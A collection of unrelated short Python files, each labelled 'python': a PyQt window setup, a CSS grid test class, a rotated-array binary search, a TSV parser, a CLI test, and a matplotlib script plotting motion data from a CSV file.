bolilla")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Datos del ensayo")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) MainWindow = QtWidgets.QMainWindow() ui = Ui_MainWindow() ui.setupUi(MainWindow) MainWindow.show() sys.exit(app.exec_())
python
from tests.utils import W3CTestCase class TestGridPositionedItemsContentAlignment(W3CTestCase): vars().update(W3CTestCase.find_tests(__file__, 'grid-positioned-items-content-alignment-'))
python
def search(nums: list[int], target: int) -> int: start, end = 0, len(nums) - 1 while start + 1 < end: mid = (start + end) // 2 if nums[mid] == target: return mid # Situaion 1: mid is in the left ascending part if nums[mid] > nums[start]: if target >= nums[start] and target < nums[mid]: end = mid else: start = mid # Situaion 2: mid is in the right ascending part else: if target <= nums[end] and target > nums[mid]: start = mid else: end = mid if nums[start] == target: return start if nums[end] == target: return end return -1 if __name__ == "__main__": print(search([4,5,6,7,0,1,2], 0)) print(search([4,5,6,7,0,1,2], 3)) print(search([1], 0)) print(search([1,3,5], 1)) print(search([5,1,3], 5))
python
from .csv_parser import Parser as BaseParser class Parser(BaseParser): """Extract text from tab separated values files (.tsv). """ delimiter = '\t'
python
from mbctl import cli def test_cli_ok(): cli.run(['list'])
python
# -*- coding: utf-8 -*- """ Created on Sun Dec 5 00:25:04 2021 @author: Perry """ # import csv and matplotlib import csv import matplotlib.pyplot as plt # read data.csv into a dictionary called data data = csv.DictReader(open("data.csv")) # split the data into three lists for x, y, and z dataArrays = {"time": [], "x": [], "y": [], "z": [], "vx": [], "vy": [], "vz": [], "ax": [], "ay": [], "az": []} for row in data: for key in dataArrays: dataArrays[key].append(float(row[key])) # Plot x, y, and z velocity plt.subplot(221) plt.title("Velocity") plt.xlabel("Time (s)") plt.ylabel("Velocity (m/s)") plt.plot(dataArrays["time"], dataArrays["vx"], label="x", color="red") plt.plot(dataArrays["time"], dataArrays["vy"], label="y", color="green") plt.plot(dataArrays["time"], dataArrays["vz"], label="z", color="blue") plt.grid(True) plt.legend() # Plot x, y, and z acceleration plt.subplot(223) plt.title("Acceleration") plt.xlabel("Time (s)") plt.ylabel("Acceleration (m/s^2)") plt.plot(dataArrays["time"], dataArrays["ax"], label="x", color="red") plt.plot(dataArrays["time"], dataArrays["ay"], label="y", color="green") plt.plot(dataArrays["time"], dataArrays["az"], label="z", color="blue") plt.grid(True) plt.legend() plt.subplot(122, projection='3d') plt.title("Position") plt.plot(dataArrays["x"], dataArrays["y"], dataArrays["z"], label="3D Trajectory", color="black") plt.grid(True) plt.show()
python